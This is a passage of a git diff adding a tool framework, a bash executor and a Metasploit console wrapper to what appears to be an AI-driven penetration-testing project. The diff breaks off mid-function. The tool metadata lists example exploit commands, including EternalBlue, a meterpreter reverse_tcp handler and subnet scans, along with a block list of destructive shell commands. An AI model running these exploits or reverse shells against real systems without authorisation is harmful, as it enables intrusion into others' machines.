+""" + +from .base import BaseTool, CommandInput, ToolCapability, ToolContext, ToolMetadata, ToolResult +from .registry import ToolRegistry, tool_registry +from .testing import TestCase, TestResult, ToolTester + +__all__ = [ + "BaseTool", + "CommandInput", + "ToolMetadata", + "ToolCapability", + "ToolContext", + "ToolResult", + "ToolRegistry", + "tool_registry", + "ToolTester", + "TestCase", + "TestResult", +] diff --git a/wish-tools/src/wish_tools/framework/base.py b/wish-tools/src/wish_tools/framework/base.py new file mode 100644 index 0000000..be23a34 --- /dev/null +++ b/wish-tools/src/wish_tools/framework/base.py @@ -0,0 +1,187 @@ +""" +Base classes for the wish tools framework. + +This module provides the abstract base classes and data models +that all tools must implement. +""" + +from abc import ABC, abstractmethod +from typing import Any, Dict, List, Optional + +from pydantic import BaseModel, Field + + +class ToolCapability(BaseModel): + """Describes a specific capability of a tool.""" + + name: str = Field(description="Name of the capability") + description: str = Field(description="Description of what this capability does") + parameters: Dict[str, Any] = Field(default_factory=dict, description="Parameters for this capability") + examples: List[str] = Field(default_factory=list, description="Example commands") + + +class ToolMetadata(BaseModel): + """Metadata for a tool.""" + + name: str = Field(description="Tool name") + version: str = Field(description="Tool version") + description: str = Field(description="Tool description") + author: str = Field(description="Tool author") + category: str = Field(description="Tool category (e.g., 'network', 'exploitation', 'general')") + capabilities: List[ToolCapability] = Field(default_factory=list) + requirements: List[str] = Field(default_factory=list, description="System requirements") + tags: List[str] = Field(default_factory=list, description="Tags for tool discovery") + + +class ToolContext(BaseModel): + 
"""Context passed to tools during execution.""" + + working_directory: str + environment_variables: Dict[str, str] = Field(default_factory=dict) + system_info: Optional[Dict[str, Any]] = None + run_id: Optional[str] = None + timeout_override: Optional[int] = None + + +class CommandInput(BaseModel): + """Input command for tool execution.""" + + command: str = Field(description="The command to execute") + timeout_sec: int = Field(default=300, description="Timeout in seconds") + + +class ToolResult(BaseModel): + """Result from tool execution.""" + + success: bool = Field(description="Whether execution was successful") + output: str = Field(description="Standard output from the command") + error: Optional[str] = Field(default=None, description="Error output if any") + exit_code: int = Field(description="Exit code from the command") + execution_time: float = Field(description="Execution time in seconds") + metadata: Dict[str, Any] = Field(default_factory=dict, description="Additional metadata") + + +class BaseTool(ABC): + """Abstract base class for all tools in the framework.""" + + def __init__(self, config: Optional[Dict[str, Any]] = None): + """Initialize the tool with optional configuration.""" + self.config = config or {} + self._metadata = self._build_metadata() + + @abstractmethod + def _build_metadata(self) -> ToolMetadata: + """Build and return tool metadata.""" + pass + + @property + def metadata(self) -> ToolMetadata: + """Get tool metadata.""" + return self._metadata + + @abstractmethod + async def validate_availability(self) -> tuple[bool, Optional[str]]: + """Check if the tool is available on the system. + + Returns: + Tuple of (is_available, error_message) + """ + pass + + @abstractmethod + async def execute(self, command: CommandInput, context: ToolContext, **kwargs) -> ToolResult: + """Execute a command using this tool. 
+ + Args: + command: The command to execute + context: Execution context + **kwargs: Additional tool-specific arguments + + Returns: + ToolResult containing execution results + """ + pass + + @abstractmethod + def generate_command( + self, capability: str, parameters: Dict[str, Any], context: Optional[ToolContext] = None + ) -> CommandInput: + """Generate a command for a specific capability. + + Args: + capability: The capability to use + parameters: Parameters for the capability + context: Optional execution context + + Returns: + Generated CommandInput + """ + pass + + def get_documentation(self) -> str: + """Generate comprehensive documentation for this tool.""" + doc_parts = [ + f"# {self.metadata.name}", + f"\n{self.metadata.description}", + f"\n**Version:** {self.metadata.version}", + f"**Author:** {self.metadata.author}", + f"**Category:** {self.metadata.category}", + f"**Tags:** {', '.join(self.metadata.tags)}", + "\n## Requirements", + "\n".join(f"- {req}" for req in self.metadata.requirements), + "\n## Capabilities", + ] + + for cap in self.metadata.capabilities: + doc_parts.extend([f"\n### {cap.name}", f"{cap.description}", "\n**Parameters:**"]) + for param, details in cap.parameters.items(): + doc_parts.append(f"- `{param}`: {details}") + + if cap.examples: + doc_parts.append("\n**Examples:**") + for example in cap.examples: + doc_parts.append(f"```bash\n{example}\n```") + + return "\n".join(doc_parts) + + def validate_command(self, command: CommandInput) -> tuple[bool, Optional[str]]: + """Validate if a command can be executed by this tool. 
+ + Args: + command: The command to validate + + Returns: + Tuple of (is_valid, error_message) + """ + # Default implementation - can be overridden by specific tools + return True, None + + +class ToolException(Exception): + """Base exception for tool-related errors.""" + + pass + + +class ToolNotFoundError(ToolException): + """Raised when a requested tool is not found.""" + + pass + + +class ToolRegistrationError(ToolException): + """Raised when tool registration fails.""" + + pass + + +class DuplicateToolError(ToolException): + """Raised when attempting to register a duplicate tool.""" + + pass + + +class ToolExecutionError(ToolException): + """Raised when tool execution fails.""" + + pass diff --git a/wish-tools/src/wish_tools/framework/registry.py b/wish-tools/src/wish_tools/framework/registry.py new file mode 100644 index 0000000..3bc5bbd --- /dev/null +++ b/wish-tools/src/wish_tools/framework/registry.py @@ -0,0 +1,197 @@ +""" +Tool registry for managing available tools. + +This module provides the ToolRegistry class for registering, discovering, +and managing tools in the wish framework. +""" + +import importlib +import pkgutil +from typing import Dict, List, Optional, Set, Type + +from .base import BaseTool, DuplicateToolError, ToolMetadata, ToolNotFoundError, ToolRegistrationError + + +class ToolRegistry: + """Registry for managing tools in the framework.""" + + def __init__(self): + self._tools: Dict[str, Type[BaseTool]] = {} + self._instances: Dict[str, BaseTool] = {} + self._categories: Dict[str, Set[str]] = {} + self._tags: Dict[str, Set[str]] = {} + + def register_tool(self, tool_class: Type[BaseTool], override: bool = False) -> None: + """Register a tool class. 
+ + Args: + tool_class: The tool class to register + override: Whether to override existing tool with same name + + Raises: + DuplicateToolError: If tool already exists and override is False + ToolRegistrationError: If tool class is invalid + """ + # Create temporary instance to get metadata + try: + temp_instance = tool_class() + metadata = temp_instance.metadata + except Exception as e: + raise ToolRegistrationError(f"Failed to instantiate tool: {e}") from e + + tool_name = metadata.name + + if tool_name in self._tools and not override: + raise DuplicateToolError(f"Tool '{tool_name}' already registered") + + self._tools[tool_name] = tool_class + + # Update category index + if metadata.category not in self._categories: + self._categories[metadata.category] = set() + self._categories[metadata.category].add(tool_name) + + # Update tag index + for tag in metadata.tags: + if tag not in self._tags: + self._tags[tag] = set() + self._tags[tag].add(tool_name) + + def get_tool(self, name: str, config: Optional[Dict] = None) -> BaseTool: + """Get a tool instance by name. 
+ + Args: + name: Tool name + config: Optional configuration for the tool + + Returns: + Tool instance + + Raises: + ToolNotFoundError: If tool not found + """ + if name not in self._tools: + raise ToolNotFoundError(f"Tool '{name}' not found") + + # Create instance if not cached or config provided + cache_key = f"{name}_{hash(str(config))}" if config else name + if cache_key not in self._instances: + self._instances[cache_key] = self._tools[name](config) + + return self._instances[cache_key] + + def list_tools(self) -> List[ToolMetadata]: + """List all registered tools.""" + tools = [] + for tool_class in self._tools.values(): + instance = tool_class() + tools.append(instance.metadata) + return tools + + def list_by_category(self, category: str) -> List[str]: + """List tools by category.""" + return list(self._categories.get(category, [])) + + def list_by_tag(self, tag: str) -> List[str]: + """List tools by tag.""" + return list(self._tags.get(tag, [])) + + def search_tools(self, query: str) -> List[ToolMetadata]: + """Search tools by name, description, or tags.""" + query_lower = query.lower() + results = [] + + for tool_class in self._tools.values(): + instance = tool_class() + metadata = instance.metadata + + # Search in name, description, and tags + if ( + query_lower in metadata.name.lower() + or query_lower in metadata.description.lower() + or any(query_lower in tag.lower() for tag in metadata.tags) + ): + results.append(metadata) + + return results + + def auto_discover_tools(self, package_path: str = "wish_tools.tools") -> None: + """Auto-discover and register tools from a package. 
+ + Args: + package_path: Python package path to search for tools + """ + # Import the package + try: + package = importlib.import_module(package_path) + except ImportError as e: + raise ToolRegistrationError(f"Failed to import package '{package_path}': {e}") from e + + # Walk through all modules in the package + for _, module_name, _ in pkgutil.walk_packages(package.__path__, prefix=package.__name__ + "."): + try: + module = importlib.import_module(module_name) + + # Look for BaseTool subclasses + for attr_name in dir(module): + attr = getattr(module, attr_name) + if isinstance(attr, type) and issubclass(attr, BaseTool) and attr is not BaseTool: + try: + self.register_tool(attr) + except DuplicateToolError: + # Skip duplicates during auto-discovery + pass + except Exception: + # Skip modules that fail to import + continue + + def get_tool_names(self) -> List[str]: + """Get list of all registered tool names.""" + return list(self._tools.keys()) + + def has_tool(self, name: str) -> bool: + """Check if a tool is registered.""" + return name in self._tools + + def unregister_tool(self, name: str) -> bool: + """Unregister a tool. 
+ + Args: + name: Tool name to unregister + + Returns: + True if tool was unregistered, False if not found + """ + if name not in self._tools: + return False + + # Get metadata for cleanup + instance = self._tools[name]() + metadata = instance.metadata + + # Remove from main registry + del self._tools[name] + + # Remove from instances cache + keys_to_remove = [k for k in self._instances.keys() if k.startswith(name)] + for key in keys_to_remove: + del self._instances[key] + + # Remove from category index + if metadata.category in self._categories: + self._categories[metadata.category].discard(name) + if not self._categories[metadata.category]: + del self._categories[metadata.category] + + # Remove from tag index + for tag in metadata.tags: + if tag in self._tags: + self._tags[tag].discard(name) + if not self._tags[tag]: + del self._tags[tag] + + return True + + +# Global registry instance +tool_registry = ToolRegistry() diff --git a/wish-tools/src/wish_tools/framework/testing.py b/wish-tools/src/wish_tools/framework/testing.py new file mode 100644 index 0000000..870ba62 --- /dev/null +++ b/wish-tools/src/wish_tools/framework/testing.py @@ -0,0 +1,276 @@ +""" +Testing framework for wish tools. + +This module provides utilities for testing tool implementations, +including test case definitions, validators, and reporting. 
+""" + +import asyncio +import tempfile +import time +from dataclasses import dataclass +from typing import Any, Callable, Dict, List, Optional + +from .base import BaseTool, ToolContext, ToolResult + + +@dataclass +class TestCase: + """Test case for a tool.""" + + name: str + description: str + capability: str + parameters: Dict[str, Any] + expected_success: bool + validators: List[Callable[[ToolResult], tuple[bool, str]]] + timeout: int = 300 + skip_if: Optional[Callable[[], bool]] = None + + +@dataclass +class TestResult: + """Result of a test case.""" + + test_case: TestCase + passed: bool + execution_time: float + tool_result: Optional[ToolResult] + error: Optional[str] + validation_errors: List[str] + + +class OutputValidator: + """Validator for tool output.""" + + def __init__(self, contains: Optional[str] = None, not_contains: Optional[str] = None): + self.contains = contains + self.not_contains = not_contains + + def __call__(self, result: ToolResult) -> tuple[bool, str]: + if self.contains and self.contains not in result.output: + return False, f"Output should contain '{self.contains}'" + + if self.not_contains and self.not_contains in result.output: + return False, f"Output should not contain '{self.not_contains}'" + + return True, "" + + +class ExitCodeValidator: + """Validator for exit codes.""" + + def __init__(self, expected: int): + self.expected = expected + + def __call__(self, result: ToolResult) -> tuple[bool, str]: + if result.exit_code != self.expected: + return False, f"Expected exit code {self.expected}, got {result.exit_code}" + return True, "" + + +class MetadataValidator: + """Validator for metadata content.""" + + def __init__(self, required_keys: List[str]): + self.required_keys = required_keys + + def __call__(self, result: ToolResult) -> tuple[bool, str]: + for key in self.required_keys: + if key not in result.metadata: + return False, f"Metadata missing required key: {key}" + return True, "" + + +class PerformanceValidator: + 
"""Validator for performance requirements.""" + + def __init__(self, max_time: float): + self.max_time = max_time + + def __call__(self, result: ToolResult) -> tuple[bool, str]: + if result.execution_time > self.max_time: + return False, f"Execution took {result.execution_time:.2f}s, max allowed {self.max_time}s" + return True, "" + + +class ToolTester: + """Framework for testing tools.""" + + def __init__(self, tool: BaseTool, context: Optional[ToolContext] = None): + self.tool = tool + self.context = context or self._default_context() + + def _default_context(self) -> ToolContext: + """Create default test context.""" + temp_dir = tempfile.mkdtemp() + return ToolContext(working_directory=temp_dir, environment_variables={}, run_id="test-run") + + async def test_availability(self) -> TestResult: + """Test if tool is available.""" + test_case = TestCase( + name="availability_check", + description="Check if tool is available on the system", + capability="", + parameters={}, + expected_success=True, + validators=[], + ) + + start_time = time.time() + try: + is_available, error = await self.tool.validate_availability() + + return TestResult( + test_case=test_case, + passed=is_available, + execution_time=time.time() - start_time, + tool_result=None, + error=error, + validation_errors=[], + ) + except Exception as e: + return TestResult( + test_case=test_case, + passed=False, + execution_time=time.time() - start_time, + tool_result=None, + error=str(e), + validation_errors=[], + ) + + async def run_test_case(self, test_case: TestCase) -> TestResult: + """Run a single test case.""" + # Check skip condition + if test_case.skip_if and test_case.skip_if(): + return TestResult( + test_case=test_case, + passed=True, + execution_time=0, + tool_result=None, + error="Test skipped", + validation_errors=[], + ) + + start_time = time.time() + validation_errors = [] + + try: + # Generate command + command = self.tool.generate_command( + capability=test_case.capability, 
parameters=test_case.parameters, context=self.context + ) + + # Execute command + tool_result = await asyncio.wait_for(self.tool.execute(command, self.context), timeout=test_case.timeout) + + # Check basic success/failure + if tool_result.success != test_case.expected_success: + validation_errors.append( + f"Expected success={test_case.expected_success}, got success={tool_result.success}" + ) + + # Run validators + for validator in test_case.validators: + is_valid, error = validator(tool_result) + if not is_valid: + validation_errors.append(error) + + passed = len(validation_errors) == 0 + + return TestResult( + test_case=test_case, + passed=passed, + execution_time=time.time() - start_time, + tool_result=tool_result, + error=None, + validation_errors=validation_errors, + ) + + except asyncio.TimeoutError: + return TestResult( + test_case=test_case, + passed=False, + execution_time=test_case.timeout, + tool_result=None, + error="Test timed out", + validation_errors=validation_errors, + ) + except Exception as e: + return TestResult( + test_case=test_case, + passed=False, + execution_time=time.time() - start_time, + tool_result=None, + error=str(e), + validation_errors=validation_errors, + ) + + async def run_test_suite(self, test_cases: List[TestCase]) -> List[TestResult]: + """Run a suite of test cases.""" + results = [] + + # First check availability + availability_result = await self.test_availability() + results.append(availability_result) + + if not availability_result.passed: + # Skip other tests if tool not available + return results + + # Run test cases + for test_case in test_cases: + result = await self.run_test_case(test_case) + results.append(result) + + return results + + def generate_report(self, results: List[TestResult]) -> str: + """Generate test report.""" + report_lines = [ + f"# Test Report for {self.tool.metadata.name}", + f"\nTool Version: {self.tool.metadata.version}", + f"Total Tests: {len(results)}", + f"Passed: {sum(1 for r in results if 
r.passed)}", + f"Failed: {sum(1 for r in results if not r.passed)}", + "\n## Test Results\n", + ] + + for result in results: + status = "✅ PASSED" if result.passed else "❌ FAILED" + report_lines.append(f"### {result.test_case.name} - {status}") + report_lines.append(f"**Description:** {result.test_case.description}") + report_lines.append(f"**Execution Time:** {result.execution_time:.2f}s") + + if result.error: + report_lines.append(f"**Error:** {result.error}") + + if result.validation_errors: + report_lines.append("**Validation Errors:**") + for error in result.validation_errors: + report_lines.append(f"- {error}") + + if result.tool_result: + report_lines.append("\n**Tool Output Preview:**") + output_preview = result.tool_result.output[:500] + if len(result.tool_result.output) > 500: + output_preview += "... (truncated)" + report_lines.append(f"```\n{output_preview}\n```") + + report_lines.append("") + + return "\n".join(report_lines) + + +def create_basic_test_suite(tool_name: str) -> List[TestCase]: + """Create a basic test suite for any tool.""" + return [ + TestCase( + name="metadata_check", + description="Verify tool metadata is properly configured", + capability="", + parameters={}, + expected_success=True, + validators=[], + ) + ] diff --git a/wish-tools/src/wish_tools/tool_step_trace.py b/wish-tools/src/wish_tools/tool_step_trace.py index bf4660f..e98aa01 100644 --- a/wish-tools/src/wish_tools/tool_step_trace.py +++ b/wish-tools/src/wish_tools/tool_step_trace.py @@ -25,6 +25,7 @@ class StepTraceState(BaseModel): response_status_code: レスポンスのステータスコード response_body: レスポンスのボディ """ + run_id: str trace_name: str trace_message: str @@ -51,7 +52,7 @@ def encode_trace_message(state: StepTraceState) -> StepTraceState: run_id=state.run_id, trace_name=state.trace_name, trace_message=state.trace_message, - trace_message_base64=encoded + trace_message_base64=encoded, ) @@ -69,7 +70,7 @@ def post_step_trace(state: StepTraceState) -> StepTraceState: data = { "run_id": 
state.run_id, # プレフィックスを追加しない "trace_name": state.trace_name, - "trace_message_base64": state.trace_message_base64 + "trace_message_base64": state.trace_message_base64, } try: @@ -77,7 +78,7 @@ def post_step_trace(state: StepTraceState) -> StepTraceState: response = requests.post( "http://host.docker.internal:23456/api/addStepTrace", json=data, - headers={"Content-Type": "application/json"} + headers={"Content-Type": "application/json"}, ) # レスポンスを取得 @@ -95,7 +96,7 @@ def post_step_trace(state: StepTraceState) -> StepTraceState: trace_message=state.trace_message, trace_message_base64=state.trace_message_base64, response_status_code=status_code, - response_body=body + response_body=body, ) @@ -121,11 +122,7 @@ def build_graph() -> StateGraph: return graph -def main( - run_id: str, - trace_name: str, - trace_message: str -) -> Dict[str, str]: +def main(run_id: str, trace_name: str, trace_message: str) -> Dict[str, str]: """ メイン関数 @@ -142,23 +139,13 @@ def main( graph = build_graph() # グラフの実行 - initial_state = StepTraceState( - run_id=run_id, - trace_name=trace_name, - trace_message=trace_message - ) + initial_state = StepTraceState(run_id=run_id, trace_name=trace_name, trace_message=trace_message) workflow = graph.compile() result = workflow.invoke(initial_state, {"run_name": f"Tool-StepTrace-{trace_name}"}) # 結果を返す - return { - "status_code": result["response_status_code"], - "body": result["response_body"] - } + return {"status_code": result["response_status_code"], "body": result["response_body"]} except Exception as e: # エラーが発生した場合 - return { - "status_code": 599, - "body": f"Error during workflow execution: {str(e)}" - } + return {"status_code": 599, "body": f"Error during workflow execution: {str(e)}"} diff --git a/wish-tools/src/wish_tools/tools/__init__.py b/wish-tools/src/wish_tools/tools/__init__.py new file mode 100644 index 0000000..fa92e9a --- /dev/null +++ b/wish-tools/src/wish_tools/tools/__init__.py @@ -0,0 +1,60 @@ +""" +Wish Tools - Tool 
implementations. + +This package contains the actual tool implementations that conform +to the wish tools framework interface. + +Available tools: +- BashTool: Execute bash commands +- MsfconsoleTool: Metasploit Framework console +- NmapTool: Network exploration and security auditing + +## Adding New Tools + +To add a new tool: + +1. Create a new Python file in this directory +2. Implement a class that inherits from BaseTool +3. The tool will be auto-discovered by the framework + +Example: + +```python +from wish_tools.framework.base import BaseTool, ToolMetadata, ToolCapability + +class MyTool(BaseTool): + def _build_metadata(self) -> ToolMetadata: + return ToolMetadata( + name="mytool", + version="1.0.0", + description="My custom tool", + author="Me", + category="custom", + capabilities=[...], + requirements=["mytool-binary"], + tags=["custom"] + ) + + async def validate_availability(self): + # Check if tool is available + pass + + async def execute(self, command, context): + # Execute the tool + pass + + def generate_command(self, capability, parameters, context=None): + # Generate command for LLM + pass +``` +""" + +# Import all tools to make them available for auto-discovery +try: + from .bash import BashTool + from .msfconsole import MsfconsoleTool + + __all__ = ["BashTool", "MsfconsoleTool"] +except ImportError: + # Graceful degradation if some tools can't be imported + __all__ = [] diff --git a/wish-tools/src/wish_tools/tools/bash.py b/wish-tools/src/wish_tools/tools/bash.py index afd546e..286c7ff 100644 --- a/wish-tools/src/wish_tools/tools/bash.py +++ b/wish-tools/src/wish_tools/tools/bash.py @@ -9,16 +9,14 @@ import subprocess import time from pathlib import Path -from typing import Dict, Any, Optional +from typing import Any, Dict, Optional -from wish_tools.framework.base import ( - BaseTool, ToolMetadata, ToolCapability, ToolContext, ToolResult, CommandInput -) +from wish_tools.framework.base import BaseTool, CommandInput, ToolCapability, ToolContext, 
ToolMetadata, ToolResult class BashTool(BaseTool): """Bash shell command execution tool.""" - + def _build_metadata(self) -> ToolMetadata: return ToolMetadata( name="bash", @@ -33,13 +31,13 @@ def _build_metadata(self) -> ToolMetadata: parameters={ "command": "The bash command to execute", "timeout": "Timeout in seconds (optional, default: 300)", - "category": "Command category hint (optional: network, file, process, system, web, text)" + "category": "Command category hint (optional: network, file, process, system, web, text)", }, examples=[ "# Network enumeration fallback", "nc -zv 192.168.1.1 22-443", "ping -c 4 8.8.8.8", - "# File operations fallback", + "# File operations fallback", "find /etc -name '*.conf' -type f", "grep -r 'password' /var/log/", "# Process management fallback", @@ -47,49 +45,43 @@ def _build_metadata(self) -> ToolMetadata: "netstat -tulpn | grep :80", "# System information fallback", "uname -a && cat /etc/os-release", - "df -h && free -h" - ] + "df -h && free -h", + ], ), ToolCapability( name="script", description="Execute custom bash scripts for complex operations", - parameters={ - "script": "The bash script content", - "args": "Script arguments (optional)" - }, + parameters={"script": "The bash script content", "args": "Script arguments (optional)"}, examples=[ "#!/bin/bash\n# Custom enumeration script\nfor port in 22 80 443; do nc -zv $1 $port; done", - "#!/bin/bash\n# Log analysis script\ngrep 'ERROR' /var/log/*.log | tail -20" - ] + "#!/bin/bash\n# Log analysis script\ngrep 'ERROR' /var/log/*.log | tail -20", + ], ), ToolCapability( name="tool_combination", description="Combine multiple tools with pipes and logic when no single specialized tool exists", parameters={ "command": "Complex command combining multiple tools", - "description": "Description of what the combined command does" + "description": "Description of what the combined command does", }, examples=[ "# Network discovery + service detection", - "nmap -sn 192.168.1.0/24 | 
grep 'Nmap scan report' | awk '{print $5}' | xargs -I {} nmap -sV -p 22,80,443 {}", + "nmap -sn 192.168.1.0/24 | grep 'Nmap scan report' | awk '{print $5}' | " + "xargs -I {} nmap -sV -p 22,80,443 {}", "# Log analysis with multiple filters", - "cat /var/log/auth.log | grep 'Failed password' | awk '{print $11}' | sort | uniq -c | sort -nr" - ] - ) + "cat /var/log/auth.log | grep 'Failed password' | awk '{print $11}' | " + "sort | uniq -c | sort -nr", + ], + ), ], requirements=["bash"], - tags=["shell", "fallback", "general-purpose", "universal"] + tags=["shell", "fallback", "general-purpose", "universal"], ) - + async def validate_availability(self) -> tuple[bool, Optional[str]]: """Check if bash is available.""" try: - result = subprocess.run( - ["bash", "--version"], - capture_output=True, - text=True, - timeout=5 - ) + result = subprocess.run(["bash", "--version"], capture_output=True, text=True, timeout=5) if result.returncode == 0: return True, None else: @@ -100,42 +92,34 @@ async def validate_availability(self) -> tuple[bool, Optional[str]]: return False, "Bash version check timed out" except Exception as e: return False, f"Error checking bash availability: {str(e)}" - - async def execute( - self, - command: CommandInput, - context: ToolContext, - **kwargs - ) -> ToolResult: + + async def execute(self, command: CommandInput, context: ToolContext, **kwargs) -> ToolResult: """Execute a bash command.""" start_time = time.time() - + try: # Prepare environment env = dict(context.environment_variables) env.update(kwargs.get("env", {})) - + # Create working directory if it doesn't exist work_dir = Path(context.working_directory) work_dir.mkdir(parents=True, exist_ok=True) - + # Run bash command process = await asyncio.create_subprocess_shell( command.command, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE, cwd=context.working_directory, - env=env if env else None + env=env if env else None, ) - + # Set up timeout timeout = command.timeout_sec or 
context.timeout_override or 300 - + try: - stdout, stderr = await asyncio.wait_for( - process.communicate(), - timeout=timeout - ) + stdout, stderr = await asyncio.wait_for(process.communicate(), timeout=timeout) except asyncio.TimeoutError: process.kill() await process.wait() @@ -145,15 +129,15 @@ async def execute( error="Command timed out", exit_code=124, # Standard timeout exit code execution_time=timeout, - metadata={"timeout": True, "command": command.command} + metadata={"timeout": True, "command": command.command}, ) - + # Decode output - output = stdout.decode('utf-8', errors='replace') if stdout else "" - error = stderr.decode('utf-8', errors='replace') if stderr else "" - + output = stdout.decode("utf-8", errors="replace") if stdout else "" + error = stderr.decode("utf-8", errors="replace") if stderr else "" + execution_time = time.time() - start_time - + return ToolResult( success=process.returncode == 0, output=output, @@ -163,10 +147,10 @@ async def execute( metadata={ "command": command.command, "working_directory": context.working_directory, - "run_id": context.run_id - } + "run_id": context.run_id, + }, ) - + except Exception as e: return ToolResult( success=False, @@ -174,42 +158,33 @@ async def execute( error=f"Execution error: {str(e)}", exit_code=-1, execution_time=time.time() - start_time, - metadata={"command": command.command, "error_type": type(e).__name__} + metadata={"command": command.command, "error_type": type(e).__name__}, ) - + def generate_command( - self, - capability: str, - parameters: Dict[str, Any], - context: Optional[ToolContext] = None + self, capability: str, parameters: Dict[str, Any], context: Optional[ToolContext] = None ) -> CommandInput: """Generate a bash command for the specified capability.""" if capability == "execute": - return CommandInput( - command=parameters["command"], - timeout_sec=parameters.get("timeout", 300) - ) - + return CommandInput(command=parameters["command"], timeout_sec=parameters.get("timeout", 
300)) + elif capability == "script": # Create a temporary script file and execute it script_content = parameters["script"] args = parameters.get("args", "") - + # For now, use a simple inline approach # In production, might want to write to a temp file escaped_script = script_content.replace("'", "'\"'\"'") command = f"bash -c '{escaped_script}'" if args: command += f" {args}" - - return CommandInput( - command=command, - timeout_sec=parameters.get("timeout", 300) - ) - + + return CommandInput(command=command, timeout_sec=parameters.get("timeout", 300)) + elif capability == "file_ops": operation = parameters["operation"] - + if operation == "read": command = f"cat '{parameters['source']}'" elif operation == "write": @@ -224,19 +199,16 @@ def generate_command( command = f"mv '{parameters['source']}' '{parameters['target']}'" else: raise ValueError(f"Unknown file operation: {operation}") - - return CommandInput( - command=command, - timeout_sec=parameters.get("timeout", 60) - ) - + + return CommandInput(command=command, timeout_sec=parameters.get("timeout", 60)) + else: raise ValueError(f"Unknown capability: {capability}") - + def validate_command(self, command: CommandInput) -> tuple[bool, Optional[str]]: """Validate bash command syntax and safety.""" cmd = command.command.strip() - + # Basic safety checks dangerous_patterns = [ "rm -rf /", @@ -244,15 +216,15 @@ def validate_command(self, command: CommandInput) -> tuple[bool, Optional[str]]: "dd if=/dev/zero", "mkfs.", "fdisk", - "parted" + "parted", ] - + for pattern in dangerous_patterns: if pattern in cmd.lower(): return False, f"Command contains dangerous pattern: {pattern}" - + # Check for empty command if not cmd: return False, "Command cannot be empty" - - return True, None# Test change + + return True, None diff --git a/wish-tools/src/wish_tools/tools/msfconsole.py b/wish-tools/src/wish_tools/tools/msfconsole.py new file mode 100644 index 0000000..4a64640 --- /dev/null +++ 
b/wish-tools/src/wish_tools/tools/msfconsole.py @@ -0,0 +1,343 @@ +""" +Metasploit Framework console tool implementation. + +This tool provides a non-interactive interface to msfconsole for +penetration testing workflows in the wish framework. +""" + +import asyncio +import re +import subprocess +import time +from typing import Any, Dict, Optional + +from wish_tools.framework.base import BaseTool, CommandInput, ToolCapability, ToolContext, ToolMetadata, ToolResult + + +class MsfconsoleTool(BaseTool): + """Metasploit Framework console tool.""" + + def _build_metadata(self) -> ToolMetadata: + return ToolMetadata( + name="msfconsole", + version="1.0.0", + description="Metasploit Framework penetration testing tool", + author="Wish Framework Team", + category="exploitation", + capabilities=[ + ToolCapability( + name="exploit", + description="Run an exploit module against target(s)", + parameters={ + "module": "The exploit module path (e.g., exploit/windows/smb/ms17_010_eternalblue)", + "rhosts": "Target host(s) - IP address or range", + "rport": "Target port (optional, module default used if not specified)", + "payload": "Payload to use (optional, module default used if not specified)", + "lhost": "Local host for reverse connection (required for reverse payloads)", + "lport": "Local port for reverse connection (optional, default: 4444)", + "options": "Additional module options as key-value pairs (optional)", + }, + examples=[ + "use exploit/windows/smb/ms17_010_eternalblue; set RHOSTS 192.168.1.100; " + "set LHOST 192.168.1.10; exploit", + "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; " + "set LHOST 192.168.1.10; exploit", + ], + ), + ToolCapability( + name="auxiliary", + description="Run an auxiliary module (scanners, fuzzers, etc.)", + parameters={ + "module": "The auxiliary module path (e.g., auxiliary/scanner/smb/smb_version)", + "rhosts": "Target host(s) - IP address or range", + "rport": "Target port (optional)", + "options": "Additional 
module options as key-value pairs (optional)", + }, + examples=[ + "use auxiliary/scanner/smb/smb_version; set RHOSTS 192.168.1.0/24; run", + "use auxiliary/scanner/portscan/tcp; set RHOSTS 192.168.1.100; set PORTS 1-1000; run", + ], + ), + ToolCapability( + name="search", + description="Search for modules by name, platform, or CVE", + parameters={ + "query": "Search query (module name, CVE, platform, etc.)", + "type": "Module type filter (optional: exploit, auxiliary, post, payload)", + }, + examples=[ + "search type:exploit platform:windows smb", + "search cve:2017-0144", + "search apache struts", + ], + ), + ToolCapability( + name="info", + description="Get detailed information about a module", + parameters={"module": "Full module path to get information about"}, + examples=[ + "info exploit/windows/smb/ms17_010_eternalblue", + "info auxiliary/scanner/smb/smb_version", + ], + ), + ], + requirements=["metasploit-framework"], + tags=["exploitation", "pentesting", "vulnerability", "msf", "metasploit"], + ) + + async def validate_availability(self) -> tuple[bool, Optional[str]]: + """Check if msfconsole is available.""" + try: + result = subprocess.run(["msfconsole", "-v"], capture_output=True, text=True, timeout=10) + if result.returncode == 0: + return True, None + else: + return False, "msfconsole returned non-zero exit code" + except FileNotFoundError: + return False, "msfconsole not found. 
Please install Metasploit Framework" + except subprocess.TimeoutExpired: + return False, "msfconsole version check timed out" + except Exception as e: + return False, f"Error checking msfconsole availability: {str(e)}" + + async def execute(self, command: CommandInput, context: ToolContext, **kwargs) -> ToolResult: + """Execute msfconsole command in non-interactive mode.""" + start_time = time.time() + + try: + # Prepare msfconsole command with proper formatting + msf_command = self._prepare_msf_command(command.command) + + # Run msfconsole in non-interactive mode + process = await asyncio.create_subprocess_exec( + "msfconsole", + "-q", + "-x", + msf_command, + stdout=asyncio.subprocess.PIPE, + stderr=asyncio.subprocess.PIPE, + cwd=context.working_directory, + ) + + # Set up timeout - exploits can take a while + timeout = command.timeout_sec or context.timeout_override or 600 + + try: + stdout, stderr = await asyncio.wait_for(process.communicate(), timeout=timeout) + except asyncio.TimeoutError: + process.kill() + await process.wait() + return ToolResult( + success=False, + output="", + error="msfconsole command timed out", + exit_code=124, + execution_time=timeout, + metadata={"timeout": True, "command": msf_command}, + ) + + # Parse output + output = stdout.decode("utf-8", errors="replace") if stdout else "" + error = stderr.decode("utf-8", errors="replace") if stderr else "" + + # Determine success based on output content and exit code + success = self._determine_success(output, error, process.returncode) + + # Extract metadata from output + metadata = self._extract_msf_metadata(output) + metadata.update( + {"command": msf_command, "working_directory": context.working_directory, "run_id": context.run_id} + ) + + return ToolResult( + success=success, + output=output, + error=error if error else None, + exit_code=process.returncode or 0, + execution_time=time.time() - start_time, + metadata=metadata, + ) + + except Exception as e: + return ToolResult( + 
